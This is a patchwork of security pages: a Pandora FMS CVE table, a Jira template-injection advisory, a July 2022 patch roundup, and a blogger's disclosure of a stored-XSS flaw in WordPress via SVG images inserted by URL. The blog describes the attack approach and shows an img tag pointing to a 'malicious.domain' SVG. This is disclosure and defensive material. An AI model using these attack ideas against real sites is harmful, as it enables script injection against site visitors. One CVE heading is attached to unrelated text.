Pandora FMS v7.0NG.760 and below allows an improper access control in Configuration (Credential store) where a user with the role of Operator (Write) could create, delete, view existing keys which are outside the intended role.

CVE

Vulnerability description

Publication Date

Solution

Assigner CNA

Reported By:

CVE-2022-2059

In Pandora FMS v7.0NG.761 and below, in the agent creation section, the **alias** parameter is vulnerable to a Stored Cross Site-Scripting. This vulnerability can be exploited by an attacker with administrator privileges logged in the system.

14-06-2022

This vulnerability has been solved in the 762 version of Pandora FMS.

Ártica PFMS

External analysis

CVE-2022-2032

In Pandora FMS v7.0NG.761 and below, in the file manager section, the **dirname** parameter is vulnerable to a Stored Cross Site-Scripting. This vulnerability can be exploited by an attacker with administrator privileges logged in the system.

14-06-2022

This vulnerability has been solved in the 762 version of Pandora FMS.

Ártica PFMS

External analysis

CVE-2022-1648

Pandora FMS v7.0NG.760 and below allows a relative path traversal in File Manager where a privileged user could upload a .php file outside the intended images directory which is restricted to execute the .php file. The impact could lead to a Remote Code Execution with running application privilege.

13-05-2022

This vulnerability has been solved in the 761 version of Pandora FMS.

Ártica PFMS

External analysis

CVE-2022-26310

Pandora FMS v7.0NG.760 and below allows an improper authorization in User Management where any authenticated user with access to the User Management module could create, modify or delete any user with full admin privilege. The impact could lead to a vertical privilege escalation to access the privileges of a higher-level user or typically an admin user.

13-05-2022

This vulnerability has been solved in the 761 version of Pandora FMS.

Ártica PFMS

External analysis

CVE-2022-26309

Pandora FMS v7.0NG.760 and below allows a Cross-Site Request Forgery in Bulk operation (User operation) resulting in an elevation of privilege to Administrator group.

13-05-2022

This vulnerability has been solved in the 761 version of Pandora FMS.

Ártica PFMS

External analysis

CVE-2022-26308

Pandora FMS v7.0NG.760 and below allows an improper access control in Configuration (Credential store) where a user with the role of Operator (Write) could create, delete, view existing keys which are outside the intended role.

13-05-2022

This vulnerability has been solved in the 761 version of Pandora FMS.

Ártica PFMS

External analysis

CVE-2021-46681

There is an XSS vulnerability in Pandora FMS version 756 and below, which allows an attacker to execute javascript code through the **massive operation** name field.

21-02-2022

This vulnerability has been solved in the 757 version of Pandora FMS.

Ártica PFMS

Internal analysis

CVE-2021-46680

There is an XSS vulnerability in Pandora FMS version 756 and below, which allows an attacker to execute javascript code through the **module form** name field.

21-02-2022

This vulnerability has been solved in the 757 version of Pandora FMS.

Ártica PFMS

Internal analysis

CVE-2021-46679

There is an XSS vulnerability in Pandora FMS version 756 and below, which allows an attacker to execute javascript code through **service elements**.

21-02-2022

This vulnerability has been solved in the 757 version of Pandora FMS.

Ártica PFMS

Internal analysis

CVE-2021-46678

There is an XSS vulnerability in Pandora FMS version 756 and below, which allows an attacker to execute javascript code through the **service** name field.

21-02-2022

This vulnerability has been solved in the 757 version of Pandora FMS.

Ártica PFMS

Internal analysis

CVE-2021-46677

There is an XSS vulnerability in Pandora FMS version 756 and below, which allows an attacker to execute javascript code through the **event filter** name field.

21-02-2022

This vulnerability has been solved in the 757 version of Pandora FMS.

Ártica PFMS

Internal analysis

CVE-2021-46676

There is an XSS vulnerability in Pandora FMS version 756 and below, which allows an attacker to execute javascript code through the **transactional maps** name field.

21-02-2022

This vulnerability has been solved in the 757 version of Pandora FMS.

Ártica PFMS

Internal analysis

CVE-2022-0507

Found a potential security vulnerability inside the Pandora API. Affected Pandora FMS version range: all versions of NG version, up to OUM 759. This vulnerability could allow an attacker with authenticated IP to inject SQL.

10-02-2022

This vulnerability has been solved in the 760 version of Pandora FMS.

Ártica PFMS

\-

CVE-2022-26308: Coordinated CVEs

This issue exists to document that a security improvement in the way that Jira Server and Data Center use templates has been implemented. Affected versions of Atlassian Jira Server and Data Center allowed remote attackers with system administrator permissions to execute arbitrary code via Template Injection leading to Remote Code Execution (RCE) in the Email Templates feature. In this case the security improvement was to protect against using the XStream library to be able to execute arbitrary code in velocity templates. The affected versions are before version 8.13.19, from version 8.14.0 before 8.20.7, and from version 8.21.0 before 8.22.1.

This issue exists to document that a security improvement in the way that Jira Server and Data Center use templates has been implemented.

Affected versions of Atlassian Jira Server and Data Center allowed remote attackers with system administrator permissions to execute arbitrary code via Template Injection leading to Remote Code Execution (RCE) in the Email Templates feature. In this case the security improvement was to protect against using the XStream library to be able to execute arbitrary code from velocity templates.

Affected versions are before version 8.13.19, from version 8.14.0 before 8.20.7, and from version 8.21.0 before 8.22.1

**Affected versions:**

*   version < 8.13.19
*   8.14.0 ≤ version < 8.20.7
*   8.21.0 ≤ version < 8.22.1

**Fixed versions:**

*   8.13.19
*   8.20.7
*   8.22.1

CVE-2022-36799: [JRASERVER-73582] Template Injection in Email Templates - bypass of mitigation via XStream - CVE-2022-36799

Plus: A Google Chrome patch licks the DevilsTongue spyware, Android’s kernel gets a tune-up, and Microsoft fixes 84 flaws.

July has been a month of important updates, including patches for already-exploited vulnerabilities in Microsoft and Google products. This month also saw the first Apple iOS update in eight weeks, fixing dozens of security flaws in iPhones and iPads.

Security vulnerabilities continue to hit enterprise products, too, with July patches issued for SAP, Cisco, and Oracle software. Here’s what you need to know about the vulnerabilities fixed in July.

Apple iOS 15.6

Apple has released iOS and iPadOS 15.6 to fix 37 security flaws, including an issue in Apple File System (APFS) tracked as CVE-2022-32832. If exploited, the vulnerability could allow an app to execute code with kernel privileges, according to Apple’s support page, giving it deep access to your device.

Other iOS 15.6 patches fix vulnerabilities in the kernel and WebKit browser engine, as well as flaws in IOMobileFrameBuffer, Audio, iCloud Photo Library, ImageIO, Apple Neural Engine, and GPU Drivers.

Apple isn’t aware of any of the patched flaws being used in attacks, but some of the vulnerabilities are pretty serious—especially those affecting the kernel at the heart of the operating system. It’s also possible for vulnerabilities to be chained together in attacks, so make sure you update as soon as possible.

The iOS 15.6 patches were released alongside watchOS 8.7, tvOS 15.6, macOS Monterey 12.5, macOS Big Sur 11.6.8, and macOS Catalina 10.15.7 2022-005.

Google Chrome

Google released an emergency patch for its Chrome browser in July, fixing four issues, including a zero-day flaw that has already been exploited. Tracked as CVE-2022-2294 and reported by Avast Threat Intelligence researchers, the memory corruption vulnerability in WebRTC was abused to achieve shellcode execution in Chrome’s renderer process.

The flaw was used in targeted attacks against Avast users in the Middle East, including journalists in Lebanon, to deliver spyware called DevilsTongue.

Based on the malware and tactics used to carry out the attack, Avast attributes the use of the Chrome zero-day to Candiru, an Israel-based company that sells spyware to governments.

Microsoft’s Patch Tuesday

Microsoft’s July Patch Tuesday is a big one, fixing 84 security issues including a flaw already being used in real-world attacks. The vulnerability, CVE-2022-22047, is a local privilege escalation flaw in the Windows Client/Server Runtime Subsystem (CSRSS) server and client Windows platforms, including the latest Windows 11 and Windows Server 2022 releases. An attacker able to successfully exploit the vulnerability could gain System privileges, according to Microsoft.

Of the 84 issues patched in Microsoft’s July Patch Tuesday, 52 were privilege escalation flaws, four were security feature bypass vulnerabilities, and 12 were remote code execution issues.

Microsoft security patches do sometimes cause other issues, and the July update was no different: Following the release, some users found MS Access runtime applications did not open. Thankfully, the firm is rolling out a fix.

Android July Security Bulletin

Google has released July updates for its Android operating system, including a fix for a critical security vulnerability in the System component that could lead to remote code execution with no additional privileges needed.

Google also fixed serious issues in the kernel–which could result in information disclosure—and the framework, which could lead to local privilege escalation. Meanwhile, vendor-specific patches from MediaTek, Qualcomm, and Unisoc are available if your device is using those chips. Samsung devices are starting to receive the July patch, and Google also released updates for its Pixel range.

SAP

Software maker SAP has issued 27 new and updated security notes as part of its July Security Patch Day, fixing multiple high-severity vulnerabilities. Tracked as CVE-2022-35228, the most serious issue is an information disclosure flaw in the central management console of the vendor’s Business Objects platform.

The vulnerability allows an unauthenticated attacker to gain token information over the network, according to security firm Onapsis. “Fortunately, an attack like this would require a legitimate user to access the application,” the firm adds. However, it’s still important to patch as soon as possible.

Oracle

Oracle has issued 349 patches in its July 2022 Critical Patch Update, including fixes for 230 flaws that can be exploited remotely.

Oracle’s April Patch Update included 520 security fixes, some of which addressed CVE-2022-22965, aka Spring4Shell, a remote code execution flaw in the spring framework. Oracle’s July update continues to address this issue.

Apple Just Patched 37 iPhone Security Bugs

The Gutenberg plugin through 13.7.3 for WordPress allows stored XSS by the Contributor role via an SVG document to the "Insert from URL" feature. NOTE: the XSS payload does not execute in the context of the WordPress instance's domain; however, analogous attempts by low-privileged users to reference SVG documents are blocked by some similar products, and this behavioral difference might have security relevance to some WordPress site administrators.

**Introduction**

I found a Stored Cross Site Scripting vulnerability in WordPress that got rejected and got labeled as **Informative** by the WordPress Team. Today is the 45th day since I reported the vulnerability and yet the vulnerability is not patched as of writing this and I leave this for the reader to decide what they think of this and whether I should write more posts like this or not.

**Table of Contents**

*   The Vendor
*   CVE-2022-33994:- Stored XSS in WordPress via improper validation of SVG file loaded over an URL.
    *   Timeline
    *   The Vulnerability
    *   The Remediation
    *   Afterthought

*   Conclusion

**The Vendor**

WordPress is the most popular Content Management System on this planet and runs more than **42%** of all websites. It’s popularity and flexibility is what made it my choice for building my Blog. WordPress also comes with a lot options to make a site super secure, both at a code level and with plugins(which I don’t recommend). Now, it’s obvious that I’m biased towards WordPress and as such I don’t want bore people by talking how great WordPress is.

Finding a vulnerability in WordPress was one of the goals in my _list of goals_ and this vulnerability helped me shorten my _list of goals_ by one line.:-) Now, the WordPress Team considers this vulnerability as just informative but MITRE thinks this is a real vulnerability and allocated me a CVE ID in less than 11 hours!!

**CVE-2022-33994:- Stored XSS in WordPress via improper validation of SVG file loaded over an URL.****Timeline**

WordPress is not a CNA partner of MITRE but as WordPress runs more than **42%** of all websites on the planet, I decided to reported this vulnerability directly to them before reporting to MITRE. I looked for security.txt file on WordPress.org website and found their contact address is at a Bug Bounty Platform. So, I reported the vulnerability first there and this timeline starts from there. Today is the 45th day since I first reported the vulnerability to them and they’ve still not fixed this issue.

**15/06/2022** – Reported the vulnerability to WordPress.

**16/06/2022** – WordPress started investigating the vulnerability.

**17/06/2022** – WordPress classified the vulnerability as informative and closed the report.

**19/06/2022 13:45** – Reported the vulnerability to MITRE.

**20/06/2022 00:19** – MITRE allocated me CVE-2022-33994.

**The Vulnerability**

So, the story starts from another project of mine. I found a similar vulnerability in another Vendor’s project which the Vendor acknowledge as a vulnerability and said they’re already aware of it but mentioned it as out of scope. So, basically the problem is WordPress doesn’t do any validation on image files that are being loaded over an URL. For e.g, if you try to upload a SVG file by using the WordPress image Upload button, it’ll give you an error saying :- Sorry, you are not allowed to upload this file type.

SVG file upload not allowed

The same error shows up when you try the Media Library option. But as you can see from the image above, there is a third option called Insert from URL which allows to render remote files on a WordPress hosted site. But, the **BIG** problem is you can add an image file of _any_ extension over an URL, i.e svg, php, xml, nuts, butts etc. and WordPress would allow it without showing any errors as above.

As you can see from the video above I was able to load the same SVG file that got rejected earlier. Now, lets talk about the more important part of this vulnerability, i.e why it can be considered serious.

WordPress has a lot of security features and one of them is that only someone with Editor and above privileges in WordPress can load arbitrary JavaScript/HTML code in a blog post. An user with the privileges of an Author or Contributor cannot load HTML tags like iframe, embed, script, svg etc. and these tags will get automatically removed if added by such a user. But the problem here is, the above vulnerability allows users with Author or below privileges to load SVG files with arbitrary Javascript code embedded in them. Now, the fun thing is when I submitted the vulnerability to MITRE, I mentioned in the vuln description that someone with Author/Contributor privileges can load arbitrary SVG files, but MITRE suggested me a changed description that someone with _just_ Contributor privileges, which is the lowest privilege in WordPress, can load arbitrary HTML/JS code. I think MITRE were just trying to be helpful by suggesting the vulnerability is worse than I mentioned. 🙂

Now, the question must be that the vulnerability looks all good, so why did WordPress classified this Vulnerability as Informative? Well, not all is good _yet_ with this vulnerability. The problem now is browser protections will ignore the JavaScript embedded in SVG files if SVG images are added to the page as images, i.e within an <img tag.

    <img src="https://malicious.domain/fox.svg" alt="" >

The SVG image will still render totally fine but the JavaScript inside it won’t load in the context of the WordPress hosted domain. Now, one would argue that they can embed an SVG file directly using the <svg> html tag or they can reference it using using an <iframe\> or <object> tag which will effectively make it as if JavaScript is written outside the SVG file and is embedded directly into page. Yes, this would work but as we know an user with Author/Contributor privileges is not allowed to use the tags to embed HTML directly in WordPress, this method doesn’t works. So, I’d say that the argument of the WordPress Team was _somewhat_ right even though the _origin_ header of a **GET** request to the image shows the WordPress domain in logs.

Also, even if the SVG backdoor didn’t execute in the context of the WordPress hosted domain, the XSS payload will get executed once the SVG file is opened directly(which a lot of people normally do, including me)! An attacker can implant a BeEF XSS hook or deploy other similar techniques and takeover the _entire browser_ of the victim and not just the WordPress domain! This attack could further devolve into Remote Code execution if the victim’s browser is not updated and is vulnerable. Now, as this vulnerability requires user interaction this is not of very high severity but when you consider the fact that WordPress hosts **42%** of all websites in the world this really becomes a high severity vulnerability and I think is one of the main reason MITRE allocated it a CVE in less the 12 hours! You’ll never know when one of your _regular_ trusted blogs may be hosting such a backdoor.

But I know that still some mean minded folks would argue that this isn’t a vulnerability in WordPress as the XSS file loaded from another domain. If this is so, then tell me why the hell companies like Google and Slack went to the extent of validating files that are loaded over an URL and rejecting the files if they’re found to be SVG! Now similar to WordPress, Google and Slack also don’t allow uploading SVG files to their respective services but alongwith that they also **don’t** allow SVG files to load over an URL, which WordPress does! Here is a sample video showing how Google’s Blogger rejects SVG files:-

The interesting thing is Google doesn’t render SVG files even in their ubiquitous Google Photos app(_try it yourself_)! As you can see from the video above that Google Photos was also an option to insert an image but somehow the guys at Google figured out that someone can try to upload a SVG file through Google Photos and made sure nobody is able to do so. When I first learned this, I was like, WTF!?I’d like to give Google a big plus for that. Similarly, Slack also implements such a Security feature. But, this brings us to our more popular and more ubiquitous WordPress, which hadn’t thought that someday somebody will come up with such an idea. I’d say it is more of an oversight by WordPress Devs and they’ll fix this issue in future releases.

**The Remediation**

My first advice for anybody reading this is to use a browser extension that reports them when they visit a website that runs WordPress. This way you’ll be take precautions before opening any images in that website.

Next, my advice for WordPress website owners is to use the WordPress Classic Editor plugin in place of the default block editor/Gutenberg plugin. The Classic Editor plugin is not vulnerable to this. Note, this advice is a must for large websites that use role based approach to allow users to post content to their website and they must use another editor that doesn’t allow loading SVG files over an URL until an official fix is available .

Now, my advice for WordPress Team is to get rid of the “Insert from url” functionality as popular content creation websites like Facebook, LinkedIn, Medium etc. and image upload websites like Flickr, Unsplash etc. don’t allow loading images from an URL and only allow uploading images directly from the user’s device. If disabling the feature is not an option, then I’d recommend to implement a kind of XML/image parser(like Google and Slack) that validates the contents of remote images before rendering them.

**Afterthought**

Now, while trying to make load the XSS payload load in context of the WordPress domain I came across SMIL. SMIL stands for Synchronized Multimedia Integration Language, which is an XML markup language that is supported by all latest browsers. Now from what I’ve read, a lot of websites and the latest SMIL specification itself suggest that even though browsers would prevent arbitrary JavaScript in SVG files from loading they’d allow SMIL code in SVG. SMIL helps in creating really nice SVG animations. For example look at this SVG image(Note, I’ve embedded this using WordPress **Custom HTML** option):-

Toy train SMIL SMIL animation of a little toy train demonstrating animateMotion along a path, by CMG Lee.

This is just a basic sample and is written entirely with SVG+SMIL code. Many developers have created some seriously cool SVG animations that are available on Github. Now, the problem is according to SMIL 3.0 specification we can use the JavaScript Document Object Model(DOM) in SMIL which in turn may allow us to create a XSS payload for SVG with native SMIL. Also, the security consideration for RFC 4536, which is the rfc for SMIL media content type, mentions that all of the security considerations for XML as mentioned in RFC 3023 applies to SMIL. In short, every vulnerability that’s possible with XML files is possible with SVG+SMIL files!

Now, I’ve not tested this as the specifications are bit too much of reading and as I already have gotten the CVE I wanted, I’m not really keen on going through all of them. Also, even though a lot of websites and all of the above RFCs/Specifications make it look like that there could be a possibility of code execution, I’m still a bit skeptical about them and decided it’s not worth my time to explore this further. If someone finds a way to exploit this, then kindly share your payload and enlighten us. 🙂

**Conclusion**

Another CVE writeup down and three more CVEs to go. Out of the remaining three, two of them are similar to this vulnerability. This CVE was found through a black box pentesting approach and not through source code auditing, but still I think it’s a good vulnerability considering the popularity of WordPress. I really hope the WordPress devs will fix this vulnerability as soon as possible because after reading this some evil minded folks will start deploying XSS backdoors in websites, which may put a lot of people at risk, including me. Now, the WordPress Team wanted me to discuss this vulnerability _publicly_ on Github and talk about possible solutions on fixing this, but instead I decided to publish it on my blog. As such, I think I’ve full permissions of WordPress in publishing this vulnerability. Thanks for reading. Peace!

Tag

#rce